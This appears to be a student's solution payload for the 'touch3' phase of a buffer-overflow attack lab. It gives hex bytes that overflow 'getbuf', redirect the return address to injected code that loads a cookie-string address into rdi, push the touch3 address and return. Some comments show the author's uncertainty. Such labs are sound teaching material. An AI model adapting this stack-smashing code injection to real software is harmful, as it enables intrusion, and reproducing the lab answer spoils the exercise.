00 00 00 00 00 00 00 00 /* overflow buffer */
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
48 9d 67 55 00 00 00 00 /* replace getbuf retaddr with the address of the instructions */

48 c7 c7 80 9d 67 55 90 /* rdi = address of string */

68 f2 17 40 00 90 90 90 /* push touch3 address to stack so that it returns to this address */
c3 00 00 00 00 00 00 00 /* and then replace rdi values */

00 00 00 00 00 00 00 00 /* bunch of null bytes for hexmatch and strncmp to override */
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
35 62 33 36 61 35 38 65 /* string stored in memory */
00 00 00 00 00 00 00 00 /* not in little endian for some reason ? */


/* We need */
/* instruction to go to new code segment */
/* instruction to replace rdi value with the string address */
/* instruction to go to touch3 */
/* string stored in memory */

/* string address (?) 0x55679d60 */